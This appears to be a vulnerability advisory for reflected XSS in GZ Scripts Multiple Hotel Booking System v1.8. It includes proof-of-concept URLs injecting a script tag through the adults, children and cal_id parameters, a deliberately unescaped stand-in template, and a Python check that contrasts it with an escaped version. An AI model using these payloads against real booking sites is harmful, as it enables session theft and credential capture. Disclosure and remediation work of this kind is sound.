GZ SCRIPTS MULTIPLE HOTEL BOOKING SYSTEM VULNERABLE TO REFLECTED-XSS

GZ Scripts Multiple Hotel Booking System, an open-source application for managing bookings across several hotels, has been found to be vulnerable to reflected XSS (Cross-Site Scripting).

GZ-SCRIPTS.png

The system, which lets its users manage bookings across multiple hotels, was designed with two access levels: Super Admin and Hotel Owner (Agent).

admin-panel-GZ-scripts-01.png

Image source: fixitgearware.

GZ Scripts Multiple Hotel Booking System v1.8 is vulnerable to reflected XSS (RXSS): request parameters are written back into the page without output encoding, so an attacker can inject markup and script into the page as it is rendered for the victim.

If a victim opens a crafted link sent by an attacker by email or through any messaging platform, the injected script runs in the victim's browser within the site's origin. From there it can, for example, read the victim's session token (where the session cookie is not marked HttpOnly) or capture login credentials (usernames and passwords) by altering the login form.

The GET ‘adults’ request:

The ‘adults’ GET parameter of the getAvailabilityPackages action is reflected without encoding. The link below carries the payload URL-encoded, as an attacker would deliver it, followed by its decoded form.

The Encoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefinedxzk17%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez85vz&children=undefined&cal_id=2

The Decoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefinedxzk17"><script>alert(1)</script>z85vz&children=undefined&cal_id=2

adult-decoded-01.png

The GET ‘children’ request:

The ‘children’ GET parameter of the same action is reflected without encoding. Again the link is shown URL-encoded, as delivered, and then decoded.

The Encoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefinedfdyyb%22%3e%3cscript%3ealert(1)%3c%2fscript%3ecwp1x&cal_id=2

The Decoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefinedfdyyb"><script>alert(1)</script>cwp1x&cal_id=2

children-decoded-01.png

The GET ‘cal_id’ request:

The ‘cal_id’ GET parameter is reflected without encoding as well. The link is shown URL-encoded, as delivered, and then decoded.

The Encoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefined&cal_id=2kf9oz%22%3e%3cscript%3ealert(1)%3c%2fscript%3exqwmm

The Decoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefined&cal_id=2kf9oz"><script>alert(1)</script>xqwmm

call_id_vulnerable-01.png
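To make the three reflections concrete, here is an added Python example (not code from the advisory or from GZ Scripts) that URL-decodes the links above, feeds the decoded parameters into a stand-in page template, and checks whether the "><script>alert(1)</script> payload lands in the output unencoded. The template is an assumption: the advisory does not show the real sink, but the "> prefix of the payload indicates a double-quoted attribute context, so the stand-in writes each search value into a hidden input's value attribute. A hardened copy of the same template applies attribute-context HTML encoding with html.escape(..., quote=True), which is the fix a maintainer would apply at that sink.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The three links from the advisory ("website" is the advisory's own host placeholder).
ADVISORY_LINKS = {
    "adults": ("https://website/index.php?controller=GzFront&action=getAvailabilityPackages"
               "&date_from=undefined&date_to=undefined&adults=undefinedxzk17%22%3e%3cscript%3e"
               "alert(1)%3c%2fscript%3ez85vz&children=undefined&cal_id=2"),
    "children": ("https://website/index.php?controller=GzFront&action=getAvailabilityPackages"
                 "&date_from=undefined&date_to=undefined&adults=undefined&children=undefinedfdyyb"
                 "%22%3e%3cscript%3ealert(1)%3c%2fscript%3ecwp1x&cal_id=2"),
    "cal_id": ("https://website/index.php?controller=GzFront&action=getAvailabilityPackages"
               "&date_from=undefined&date_to=undefined&adults=undefined&children=undefined"
               "&cal_id=2kf9oz%22%3e%3cscript%3ealert(1)%3c%2fscript%3exqwmm"),
}

# The decoded payload common to all three links.
PAYLOAD = '"><script>alert(1)</script>'

# Search fields that the stand-in template echoes back into the page.
ECHOED_FIELDS = ("date_from", "date_to", "adults", "children", "cal_id")


def decode_params(url):
    """URL-decode the query string into {name: value} (first value per name)."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_vulnerable(params):
    """Assumed (hypothetical) vulnerable template: each search value is written
    straight into a double-quoted attribute, so '">' closes the attribute and
    the tag, and whatever follows becomes live markup."""
    out = []
    for name in ECHOED_FIELDS:
        value = params.get(name, "")
        out.append('<input type="hidden" name="' + name + '" value="' + value + '">')
    return "\n".join(out)


def render_hardened(params):
    """Same template with attribute-context output encoding: html.escape with
    quote=True turns " < > & ' into entities, so the value cannot leave the
    attribute."""
    out = []
    for name in ECHOED_FIELDS:
        value = html.escape(params.get(name, ""), quote=True)
        out.append('<input type="hidden" name="' + name + '" value="' + value + '">')
    return "\n".join(out)


def is_reflected_raw(page, payload=PAYLOAD):
    """True if the payload appears verbatim in the page, i.e. unencoded."""
    return payload in page


def audit(links):
    """For each advisory link, decode it and report whether the payload is
    reflected raw by the vulnerable and by the hardened stand-in.
    Returns {param: (vulnerable_reflects, hardened_reflects)}."""
    results = {}
    for param, url in links.items():
        params = decode_params(url)
        if PAYLOAD not in params.get(param, ""):
            raise ValueError(f"link for {param} does not carry the expected payload")
        results[param] = (
            is_reflected_raw(render_vulnerable(params)),
            is_reflected_raw(render_hardened(params)),
        )
    return results


if __name__ == "__main__":
    for param, (vulnerable, hardened) in audit(ADVISORY_LINKS).items():
        print(f"{param:9s} vulnerable_reflects={vulnerable} hardened_reflects={hardened}")
```

Running it prints one line per parameter: the vulnerable stand-in reflects the payload raw for all three, the hardened one for none. The same is_reflected_raw check is what you would run on the HTTP response body of a live instance to confirm a fix; the random runs such as xzk17 and z85vz on either side of the payload in the advisory's links serve as markers for locating the reflection in that body. Attribute encoding is the correct fix only for an attribute sink: a value echoed into a script block or into a URL needs the encoding for that context instead, and a Content-Security-Policy without unsafe-inline would additionally stop the injected inline script from executing.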

As of the time this vulnerability was discovered, no security update or patch had been released for sites running the GZ Scripts booking system.

Credits go to:

Packetstormsecurity

CryptoJob (Twitter)

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09  
